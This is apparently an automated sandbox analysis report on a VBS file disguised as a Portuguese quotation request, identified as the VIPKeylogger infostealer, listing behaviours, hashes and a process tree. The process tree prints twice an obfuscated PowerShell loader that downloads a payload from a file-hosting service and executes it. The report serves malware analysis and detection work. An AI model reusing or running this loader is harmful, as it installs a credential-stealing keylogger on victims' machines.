Analysis

  • max time kernel
    144s
  • max time network
    141s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01-11-2024 05:37

General

  • Target

    Pedido de Cotação -RFQ20241030_Pdf.vbs

  • Size

    335KB

  • MD5

    238e440996ccbc86ab7cb078e3952a29

  • SHA1

    eee8085b99b27c94b661d1c253bbca2338d07412

  • SHA256

    babecadcc173a09c23ee326f8b7a9a1cc9ff1d795ca4e40c686687c8c68c0f99

  • SHA512

    ffe36f620486bd3768dcac8c43b7ea8db105d588e73cd5a99e19755c53114bc0ec7df5d1d5599e723ea21f4cea3aed3d3cb869b7d8ac1746da0d52a87bb22e36

  • SSDEEP

    6144:En64ik47Q3WAFLOgL6hPnAIjxnH7sjS3xcrl0ZIRN2XrwozRMeqzAv+qmXpiEcIF:ZgcgL8jD/wGmzcspqcqkZb

Malware Config

Extracted

Family

vipkeylogger

Credentials

Signatures

  • VIPKeylogger

    VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.

  • Vipkeylogger family
  • Blocklisted process makes network request 10 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Pedido de Cotação -RFQ20241030_Pdf.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2416
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Chefkahytter forforstrkeren Stipendiary Aglossa Optegnendes #>;$Fllesmarkeder='Crinet';<#Suppressedly Regnskabsadministration ministerielle Addeem Inviolate Blanketters Unperfectedness #>; function Dksdrengene($glottalise){If ($host.DebuggerEnabled) {$Homomorphic144++;}$Peberms=$Bildkkene+$glottalise.'Length'-$Homomorphic144; for ( $Sheveret=5;$Sheveret -lt $Peberms;$Sheveret+=6){$coccygomorphic=$Sheveret;$Monoplegic+=$glottalise[$Sheveret];}$Monoplegic;}function Chaplin($Skrvebanens){ & ($Samtaleemnets) ($Skrvebanens);}$Umaadelighedens=Dksdrengene 'JimsoML,ndioAnthez eneaiJong,lCassylJed,yaSwabb/Papir ';$Flabellate=Dksdrengene ' isbuTPres l de fsCi il1Coldp2M.ckl ';$Hoste=' Noni[JanglnUn coeGentiT Vent. eateSHjforePart rHypotvTi,skiMindecMillie HawapsaneroStoreI SortNPreacTCognimDilata ToxinChewya Hom g Tilhe RechrUdetj] Arbe:inter:Varmts Telee Dyppc ekruUFuse.R Lat ID lseTSubdiY DisapKeltiRSels oP einTArb jo atsucDicynoSmrreLSpeed=Abamp$FimrefFo maLBu,ikA Gy nBShi.iEDis oLFilmsLT,onsA ArcftPalteeDiffe ';$Umaadelighedens+=Dksdrengene 'Coy,o5L.nds.backi0 aby Ejend(YampaWPro riHauntnH drod orhaoTittlwProsksTreet EctypNP repTSpnen over 1Remna0 Disp. anc0 Perr;tun,t Ac eWRe ruiHand n Tilg6Sagsb4P xie;Unawk Flerexdi ul6Under4Satsn;Skate ErindrRabbiv Clup:St nd1Tippe3 ,ilo1 mmet. C rr0 He.r)Skri ommaGFdepue kompc hoejk PolloBhuta/Kanal2Voves0elect1Tumbe0Ni,zs0Kolle1Xeno,0Svmm 1 Hype BrkkeFVirkeiChapprPe iteDubitfExocroDoctrxUskyl/Mlkeg1Mreng3Skrdd1Ar,vr..etti0Deci ';$Nedenstaaende=Dksdrengene 'Rke nUSviklSKei tEJaevnRCorra-Unr.sABan lgLa,dge EnevnPunsttHubri ';$Ekspatrieres=Dksdrengene 'Mainph onpht egnet fuldp ira scongl:Krubu/Tryk./CemendPh.torNormaiSkattvRealieKunst.vitrygGuileoSlvfao Omstg Tikrl ebraeBim t. Me oc BomboCountmHuspl/HusleuFarvec Klan? ossteParadxPeritpChayooUnve,rWifectO den=brepodIndbao mmanwQuad.nUrethlOrganoBabyeaBevb dGorsi& .heoiPail d Pike= apsa1PossePPotenKCircux DiaxMstatsT R,diDDaa seOverc3HenrehSampaq Char4 U.orJRolfdN Kaf KPopulXSla ntSammec Ka ixAstro-KrambKHyperTTmmerZAdullnDatais Unp 5 omspv Re,rOThanjlAdstrp rsnoUn onw,edegdEs,oi ';$Ambari=Dksdrengene 'Eksal> Stif ';$Samtaleemnets=Dksdrengene 'Tran iFagudEHerskX amat ';$Sethite='Flynders';$Clotildes='\Kondemnations.Stu';Chaplin (Dksdrengene 'Torne$Ele tGP ysolTinseoFaktobEmptna ,qualAnthr:datasUM lonv d udr quipGMatkaEFormiLDatalI sjlegSupertUnre,= Disc$Eti leSamstnArachVAccre:falceADkninpSinclPWoodjDHusmnA JaetTInapoA onos+ Mili$AktivCSolskL YpuroDigittSo,gsICog.alEpitodDiploE Ultrs Rese ');Chaplin (Dksdrengene 'Nonma$TightG sterlDruesOSilkibMingla O,isLSmote: RathKPriodI MelilrefekdPaloneforhoS UnveKStaveA.ndretGengiT astee D,gslNov.lOKonfivMes ieambignPakkeeHodopSMusic=Wei.h$ rutsECl.akK Drn sHauynp AmiaALngdetChampRS.netI.igorEMisprrW.ippesnustSAffor. elveSNiflipReverL spuniCraniTChara( Pylo$Re lyaD skeMRompeB .ustaCorpoRRepariAviga)Orth ');Chaplin (Dksdrengene $Hoste);$Ekspatrieres=$Kildeskattelovenes[0];$ekstasens=(Dksdrengene ' Gor.$StorhG HoveL AfpeoAnnusBHadenaK mmoLCoqui:TruanP HistAForhalUn inARombueBarcoo Bookn amnie TrevMSvirvEKo trrGynnatKristISide NVauquEDete A Madl=AriasnExtr,eS,efaWBrand-AdmeaO moribBuckoJba cheDbuinC WellT Uddr OpnaaSmi asY Vsk,sClibaT Co,tec untMPolly. uarnNOeconEkildeT Fors.FletfWlumineFiskebDong c GentlJournIOkayse addlN ForuTfiske ');Chaplin ($ekstasens);Chaplin (Dksdrengene 'Under$ForkoPEmp.daAbdiclLampeaHaffieFul eoKy,linImprieGldssmCha,oeUncomr Bilat HangiGalopn Firee U deaShowu. SeriHZ lueeBranda Resed SankeCrumbrtonefsPenid[Dakty$Co ybNlatakerealedHovede Sk.an,maadsTusintNocena TopmaModk eTh,lenStalad unmue udic],arit=Sorte$Mell UWrangmTil aaSchleaPseudd Undse AmphlWeekeiDr ekgBorehhRampoeChilddHa sheImplenNon,psUnder ');$Stvfrie=Dksdrengene 'Voldg$MortiPU graabadgelLagonaC,evaeDelinoP ojenHurlieBo tfmsjakaeMen erNe frt Ashli ruppn,ilereInco a Nond.VssunD ToteoOpka wRengrnfo nulStvrioSkraaaYugaddgenerFFee,siSpagelReswie Deli(Wampu$T kstEExorckRe,ersF evapSortiaSkrivtElverrtransiExploeUimodrHakkeeFrem.sRepro,Nucl $Co teC atodrCykele ,lidsTres iEvangvOdon eParoc)Skrm ';$Cresive=$Uvrgeligt;Chaplin (Dksdrengene 'Metod$A sthG Li,vLBedetoUnderBRedemaLrestLGyldi:GerniD BlehISt rkS Lovek Ki.eA Symbn BetoT SesseOra gNUnfur=Udsvi(PatenT Hoveeforu SBilgkTErgot-SejlaPLuksuAcar vT.iktuh Un e Potb$ HexdCHj idrPsykieUndeps Id.nIVaredV ncoresocag)Vejle ');while (!$Diskanten) {Chaplin (Dksdrengene 'Masto$Hushtg ,lasl RhaboAltmubHoneyaBa milHype,:A ridSPakket m ltoPredirs.aldfS hoooB llerPriorb Ba,brStagguDecargKorseepraecrNoneasFotoa=,amac$ S.aet ucurCes pucalimeWivec ') ;Chaplin $Stvfrie;Chaplin (Dksdrengene 'Bark sMik oT ShinaSkinkrM croTChawb-NewfasSandwLProkleN.natEannmap Hink Sport4R,gnh ');Chaplin (Dksdrengene ' Part$MiksegIntraLBorgeoEddadbMachiADilatl Stea:Descad osiICastiSSuperKSmokeAH.llanEngo.TImpenEAtomanParec= Dens(UndelT Uds E plumsRepawtUddan-Chau.p OpbaaKo.materhveHNe.fo Pa e$meg lCI drerShagtegaardS.sychIGenopv UrnfeBackb)Dr.in ') ;Chaplin (Dksdrengene 'Mijn $Sinh GHvlveLZaithoGoldwbJenlgaMy teL A si:GrnttoPerikRTal,tAAut.kT etbuo KonfRTumidlPersoiTor,ekPreexeMobil5 He.e=Imm n$Me icg DdskLSpra oMisbeb Monoa TwisLex,an:.easeSSciamuContrBEmeroO Cla b .oudLNitriIAtommq Mel u inseEbeskiLSkaffY ande+ ubge+Umrke%Nonwh$TandrKSk,diIAtom LCap rdF,rdue edbeSBy nikC,ustA,ollatCu bstHulkoE ozerLVa,iooUnpriVDisprE adion RowtenamessRetro.Ser,ecPeripOSemipU SnvsN jarkTPrinc ') ;$Ekspatrieres=$Kildeskattelovenes[$Oratorlike5];}$Kloningens=291747;$Telexes=30474;Chaplin (Dksdrengene 'Antir$SortsgD.shalDictaO GormbPilheA RekrL inot:paaskB NonmE .ellNtkkelD olstE.chmoeFol eSFiske Skri=posty GrungEleaneDispotMikro-RetsfCgigaboH,rpsNSp bat t ruEU worNi.dhaTAutoe Ungra$Ho.otcDephyrDarkleStjflsbevilIClac.vQuadretid a ');Chaplin (Dksdrengene 'Peace$Nondig arbelRekoro.olfbbKnotna yleblSlutt:ExaspAArsend ovpre Sph l ManubGnaveeBerasrLa.ultOverl Theo=feci, Sp,ci[ Ca dS Sa ayH.mmesMai itlexipeGelinmSpade.miniaC KirkoOpalinAwarevPsil eGrsserRiccitGodm ]rrel : Oxya: R.keFUncanr ForaoBygdemPelagB Ra daA maisBo tpeUd in6Paatv4BrandSemmottHyd.trConv i VirinR ombg sthn(Busin$PersiBAnkyle EspanBoksedSkjuleSy teeKonkus Oilt)Streg ');Chaplin (Dksdrengene ' Dele$HonniG,alveLAl,ogO YoghBCustoaTuttslMaksi:ObjekSGoniowUnconiCorneLBr,llLRyk.eb raveoMlkenw SamlL Ends Kaske=Nunci Lever[Sockes LivlyFi.riSChro t.arsreOverlmHandw.NominTAseiseHam lXFuseltflles.DraabeNonilnBaranCPreacOBog.pdVideriArm.rnJoustGSlagv] Spil:Tiltv:Over aCoendSLandiCDeco,iDiscriExant.Skre GPsykoeSheltT S ksSTrollTTri crPeshkIFlydenO phaGUnap.(B rde$TribaaLinoldStatiET ntelSkilnberhveeTh ncrLectiTSyste) Kapi ');Chaplin (Dksdrengene 'Monos$ issegMotivlKvkkeoM tacb Cen.AB ugtlOprik:ZoomiF JubioStayerFortefSwartrCrumbeRegissHonni=T,del$UddybS HjerWFinkmiIngrelB dirl.lbanBArctoO H roW verflBilop.EfterS mateuPeridbTaanesMil iTJo neRGe riIUnpr,n ,latgFrede(I fra$ P ndKF,owslAdr soPulviNBibetiTutteNForesg,ekvieSol dN Tu.tSKalib,Piar $IsdantSekseE oreoLNonsiED ltrx sm keWilkeSChoco)Amph, ');Chaplin $Forfres;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:5076
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Chefkahytter forforstrkeren Stipendiary Aglossa Optegnendes #>;$Fllesmarkeder='Crinet';<#Suppressedly Regnskabsadministration ministerielle Addeem Inviolate Blanketters Unperfectedness #>; function Dksdrengene($glottalise){If ($host.DebuggerEnabled) {$Homomorphic144++;}$Peberms=$Bildkkene+$glottalise.'Length'-$Homomorphic144; for ( $Sheveret=5;$Sheveret -lt $Peberms;$Sheveret+=6){$coccygomorphic=$Sheveret;$Monoplegic+=$glottalise[$Sheveret];}$Monoplegic;}function Chaplin($Skrvebanens){ & ($Samtaleemnets) ($Skrvebanens);}$Umaadelighedens=Dksdrengene 'JimsoML,ndioAnthez eneaiJong,lCassylJed,yaSwabb/Papir ';$Flabellate=Dksdrengene ' isbuTPres l de fsCi il1Coldp2M.ckl ';$Hoste=' Noni[JanglnUn coeGentiT Vent. eateSHjforePart rHypotvTi,skiMindecMillie HawapsaneroStoreI SortNPreacTCognimDilata ToxinChewya Hom g Tilhe RechrUdetj] Arbe:inter:Varmts Telee Dyppc ekruUFuse.R Lat ID lseTSubdiY DisapKeltiRSels oP einTArb jo atsucDicynoSmrreLSpeed=Abamp$FimrefFo maLBu,ikA Gy nBShi.iEDis oLFilmsLT,onsA ArcftPalteeDiffe ';$Umaadelighedens+=Dksdrengene 'Coy,o5L.nds.backi0 aby Ejend(YampaWPro riHauntnH drod orhaoTittlwProsksTreet EctypNP repTSpnen over 1Remna0 Disp. anc0 Perr;tun,t Ac eWRe ruiHand n Tilg6Sagsb4P xie;Unawk Flerexdi ul6Under4Satsn;Skate ErindrRabbiv Clup:St nd1Tippe3 ,ilo1 mmet. C rr0 He.r)Skri ommaGFdepue kompc hoejk PolloBhuta/Kanal2Voves0elect1Tumbe0Ni,zs0Kolle1Xeno,0Svmm 1 Hype BrkkeFVirkeiChapprPe iteDubitfExocroDoctrxUskyl/Mlkeg1Mreng3Skrdd1Ar,vr..etti0Deci ';$Nedenstaaende=Dksdrengene 'Rke nUSviklSKei tEJaevnRCorra-Unr.sABan lgLa,dge EnevnPunsttHubri ';$Ekspatrieres=Dksdrengene 'Mainph onpht egnet fuldp ira scongl:Krubu/Tryk./CemendPh.torNormaiSkattvRealieKunst.vitrygGuileoSlvfao Omstg Tikrl ebraeBim t. Me oc BomboCountmHuspl/HusleuFarvec Klan? ossteParadxPeritpChayooUnve,rWifectO den=brepodIndbao mmanwQuad.nUrethlOrganoBabyeaBevb dGorsi& .heoiPail d Pike= apsa1PossePPotenKCircux DiaxMstatsT R,diDDaa seOverc3HenrehSampaq Char4 U.orJRolfdN Kaf KPopulXSla ntSammec Ka ixAstro-KrambKHyperTTmmerZAdullnDatais Unp 5 omspv Re,rOThanjlAdstrp rsnoUn onw,edegdEs,oi ';$Ambari=Dksdrengene 'Eksal> Stif ';$Samtaleemnets=Dksdrengene 'Tran iFagudEHerskX amat ';$Sethite='Flynders';$Clotildes='\Kondemnations.Stu';Chaplin (Dksdrengene 'Torne$Ele tGP ysolTinseoFaktobEmptna ,qualAnthr:datasUM lonv d udr quipGMatkaEFormiLDatalI sjlegSupertUnre,= Disc$Eti leSamstnArachVAccre:falceADkninpSinclPWoodjDHusmnA JaetTInapoA onos+ Mili$AktivCSolskL YpuroDigittSo,gsICog.alEpitodDiploE Ultrs Rese ');Chaplin (Dksdrengene 'Nonma$TightG sterlDruesOSilkibMingla O,isLSmote: RathKPriodI MelilrefekdPaloneforhoS UnveKStaveA.ndretGengiT astee D,gslNov.lOKonfivMes ieambignPakkeeHodopSMusic=Wei.h$ rutsECl.akK Drn sHauynp AmiaALngdetChampRS.netI.igorEMisprrW.ippesnustSAffor. elveSNiflipReverL spuniCraniTChara( Pylo$Re lyaD skeMRompeB .ustaCorpoRRepariAviga)Orth ');Chaplin (Dksdrengene $Hoste);$Ekspatrieres=$Kildeskattelovenes[0];$ekstasens=(Dksdrengene ' Gor.$StorhG HoveL AfpeoAnnusBHadenaK mmoLCoqui:TruanP HistAForhalUn inARombueBarcoo Bookn amnie TrevMSvirvEKo trrGynnatKristISide NVauquEDete A Madl=AriasnExtr,eS,efaWBrand-AdmeaO moribBuckoJba cheDbuinC WellT Uddr OpnaaSmi asY Vsk,sClibaT Co,tec untMPolly. uarnNOeconEkildeT Fors.FletfWlumineFiskebDong c GentlJournIOkayse addlN ForuTfiske ');Chaplin ($ekstasens);Chaplin (Dksdrengene 'Under$ForkoPEmp.daAbdiclLampeaHaffieFul eoKy,linImprieGldssmCha,oeUncomr Bilat HangiGalopn Firee U deaShowu. SeriHZ lueeBranda Resed SankeCrumbrtonefsPenid[Dakty$Co ybNlatakerealedHovede Sk.an,maadsTusintNocena TopmaModk eTh,lenStalad unmue udic],arit=Sorte$Mell UWrangmTil aaSchleaPseudd Undse AmphlWeekeiDr ekgBorehhRampoeChilddHa sheImplenNon,psUnder ');$Stvfrie=Dksdrengene 'Voldg$MortiPU graabadgelLagonaC,evaeDelinoP ojenHurlieBo tfmsjakaeMen erNe frt Ashli ruppn,ilereInco a Nond.VssunD ToteoOpka wRengrnfo nulStvrioSkraaaYugaddgenerFFee,siSpagelReswie Deli(Wampu$T kstEExorckRe,ersF evapSortiaSkrivtElverrtransiExploeUimodrHakkeeFrem.sRepro,Nucl $Co teC atodrCykele ,lidsTres iEvangvOdon eParoc)Skrm ';$Cresive=$Uvrgeligt;Chaplin (Dksdrengene 'Metod$A sthG Li,vLBedetoUnderBRedemaLrestLGyldi:GerniD BlehISt rkS Lovek Ki.eA Symbn BetoT SesseOra gNUnfur=Udsvi(PatenT Hoveeforu SBilgkTErgot-SejlaPLuksuAcar vT.iktuh Un e Potb$ HexdCHj idrPsykieUndeps Id.nIVaredV ncoresocag)Vejle ');while (!$Diskanten) {Chaplin (Dksdrengene 'Masto$Hushtg ,lasl RhaboAltmubHoneyaBa milHype,:A ridSPakket m ltoPredirs.aldfS hoooB llerPriorb Ba,brStagguDecargKorseepraecrNoneasFotoa=,amac$ S.aet ucurCes pucalimeWivec ') ;Chaplin $Stvfrie;Chaplin (Dksdrengene 'Bark sMik oT ShinaSkinkrM croTChawb-NewfasSandwLProkleN.natEannmap Hink Sport4R,gnh ');Chaplin (Dksdrengene ' Part$MiksegIntraLBorgeoEddadbMachiADilatl Stea:Descad osiICastiSSuperKSmokeAH.llanEngo.TImpenEAtomanParec= Dens(UndelT Uds E plumsRepawtUddan-Chau.p OpbaaKo.materhveHNe.fo Pa e$meg lCI drerShagtegaardS.sychIGenopv UrnfeBackb)Dr.in ') ;Chaplin (Dksdrengene 'Mijn $Sinh GHvlveLZaithoGoldwbJenlgaMy teL A si:GrnttoPerikRTal,tAAut.kT etbuo KonfRTumidlPersoiTor,ekPreexeMobil5 He.e=Imm n$Me icg DdskLSpra oMisbeb Monoa TwisLex,an:.easeSSciamuContrBEmeroO Cla b .oudLNitriIAtommq Mel u inseEbeskiLSkaffY ande+ ubge+Umrke%Nonwh$TandrKSk,diIAtom LCap rdF,rdue edbeSBy nikC,ustA,ollatCu bstHulkoE ozerLVa,iooUnpriVDisprE adion RowtenamessRetro.Ser,ecPeripOSemipU SnvsN jarkTPrinc ') ;$Ekspatrieres=$Kildeskattelovenes[$Oratorlike5];}$Kloningens=291747;$Telexes=30474;Chaplin (Dksdrengene 'Antir$SortsgD.shalDictaO GormbPilheA RekrL inot:paaskB NonmE .ellNtkkelD olstE.chmoeFol eSFiske Skri=posty GrungEleaneDispotMikro-RetsfCgigaboH,rpsNSp bat t ruEU worNi.dhaTAutoe Ungra$Ho.otcDephyrDarkleStjflsbevilIClac.vQuadretid a ');Chaplin (Dksdrengene 'Peace$Nondig arbelRekoro.olfbbKnotna yleblSlutt:ExaspAArsend ovpre Sph l ManubGnaveeBerasrLa.ultOverl Theo=feci, Sp,ci[ Ca dS Sa ayH.mmesMai itlexipeGelinmSpade.miniaC KirkoOpalinAwarevPsil eGrsserRiccitGodm ]rrel : Oxya: R.keFUncanr ForaoBygdemPelagB Ra daA maisBo tpeUd in6Paatv4BrandSemmottHyd.trConv i VirinR ombg sthn(Busin$PersiBAnkyle EspanBoksedSkjuleSy teeKonkus Oilt)Streg ');Chaplin (Dksdrengene ' Dele$HonniG,alveLAl,ogO YoghBCustoaTuttslMaksi:ObjekSGoniowUnconiCorneLBr,llLRyk.eb raveoMlkenw SamlL Ends Kaske=Nunci Lever[Sockes LivlyFi.riSChro t.arsreOverlmHandw.NominTAseiseHam lXFuseltflles.DraabeNonilnBaranCPreacOBog.pdVideriArm.rnJoustGSlagv] Spil:Tiltv:Over aCoendSLandiCDeco,iDiscriExant.Skre GPsykoeSheltT S ksSTrollTTri crPeshkIFlydenO phaGUnap.(B rde$TribaaLinoldStatiET ntelSkilnberhveeTh ncrLectiTSyste) Kapi ');Chaplin (Dksdrengene 'Monos$ issegMotivlKvkkeoM tacb Cen.AB ugtlOprik:ZoomiF JubioStayerFortefSwartrCrumbeRegissHonni=T,del$UddybS HjerWFinkmiIngrelB dirl.lbanBArctoO H roW verflBilop.EfterS mateuPeridbTaanesMil iTJo neRGe riIUnpr,n ,latgFrede(I fra$ P ndKF,owslAdr soPulviNBibetiTutteNForesg,ekvieSol dN Tu.tSKalib,Piar $IsdantSekseE oreoLNonsiED ltrx sm keWilkeSChoco)Amph, ');Chaplin $Forfres;"
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4308
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Accesses Microsoft Outlook profiles
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • outlook_office_path
      • outlook_win_path
      PID:2012

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    44a071b5b03cdad0f233428b60507ab2

    SHA1

    fb2a6cb8abb0cccd428614e39cc9eb4c983cfb87

    SHA256

    b75bf24e17edc409cb664bd10198b4fef5f5166d510e13f9370efaafd9c8a6e4

    SHA512

    ffde66357926f5345190fe6f97f25bc5a4d8c6db6b62ff3f261f68b02cda396d6e8101d3f18b4fda53223652b0bbfda1577711379573c6f58cdf96110257c851

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hdg1qak5.the.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\Kondemnations.Stu

    Filesize

    419KB

    MD5

    d3eaa25322d53ddaef4b33d72552badf

    SHA1

    4d703e333fce51d3849a1467268437b89d0cf239

    SHA256

    d35582b6c56ab0068075a1a5e338cd0d24c381673cf959eca45e516fedf471f3

    SHA512

    60aa35eb0d284caab596550fe1218af035c4ba38e29196436c0f3e09f89b87d51a7bdf680995f260ab08e6b44d9e4f564cc589c3c63cbfb98598ace3ea5becd1

  • memory/2012-57-0x0000000000C00000-0x0000000001E54000-memory.dmp

    Filesize

    18.3MB

  • memory/2012-65-0x0000000023C30000-0x0000000023C3A000-memory.dmp

    Filesize

    40KB

  • memory/2012-64-0x0000000023C80000-0x0000000023D12000-memory.dmp

    Filesize

    584KB

  • memory/2012-62-0x0000000023B50000-0x0000000023BA0000-memory.dmp

    Filesize

    320KB

  • memory/2012-61-0x00000000243F0000-0x00000000245B2000-memory.dmp

    Filesize

    1.8MB

  • memory/2012-59-0x0000000023890000-0x000000002392C000-memory.dmp

    Filesize

    624KB

  • memory/2012-58-0x0000000000C00000-0x0000000000C48000-memory.dmp

    Filesize

    288KB

  • memory/4308-22-0x0000000004FA0000-0x0000000004FC2000-memory.dmp

    Filesize

    136KB

  • memory/4308-38-0x0000000007680000-0x0000000007CFA000-memory.dmp

    Filesize

    6.5MB

  • memory/4308-24-0x0000000005760000-0x00000000057C6000-memory.dmp

    Filesize

    408KB

  • memory/4308-39-0x0000000006400000-0x000000000641A000-memory.dmp

    Filesize

    104KB

  • memory/4308-37-0x0000000005EA0000-0x0000000005EEC000-memory.dmp

    Filesize

    304KB

  • memory/4308-36-0x0000000005E80000-0x0000000005E9E000-memory.dmp

    Filesize

    120KB

  • memory/4308-23-0x0000000005680000-0x00000000056E6000-memory.dmp

    Filesize

    408KB

  • memory/4308-21-0x0000000004FE0000-0x0000000005608000-memory.dmp

    Filesize

    6.2MB

  • memory/4308-34-0x0000000005810000-0x0000000005B64000-memory.dmp

    Filesize

    3.3MB

  • memory/4308-41-0x0000000007080000-0x00000000070A2000-memory.dmp

    Filesize

    136KB

  • memory/4308-40-0x00000000070E0000-0x0000000007176000-memory.dmp

    Filesize

    600KB

  • memory/4308-20-0x00000000048F0000-0x0000000004926000-memory.dmp

    Filesize

    216KB

  • memory/4308-42-0x00000000082B0000-0x0000000008854000-memory.dmp

    Filesize

    5.6MB

  • memory/4308-44-0x0000000008860000-0x000000000C1B6000-memory.dmp

    Filesize

    57.3MB

  • memory/5076-12-0x00007FFD40AA0000-0x00007FFD41561000-memory.dmp

    Filesize

    10.8MB

  • memory/5076-11-0x00007FFD40AA0000-0x00007FFD41561000-memory.dmp

    Filesize

    10.8MB

  • memory/5076-0-0x00007FFD40AA3000-0x00007FFD40AA5000-memory.dmp

    Filesize

    8KB

  • memory/5076-19-0x00007FFD40AA0000-0x00007FFD41561000-memory.dmp

    Filesize

    10.8MB

  • memory/5076-16-0x00007FFD40AA0000-0x00007FFD41561000-memory.dmp

    Filesize

    10.8MB

  • memory/5076-15-0x00007FFD40AA3000-0x00007FFD40AA5000-memory.dmp

    Filesize

    8KB

  • memory/5076-10-0x00000242CDF70000-0x00000242CDF92000-memory.dmp

    Filesize

    136KB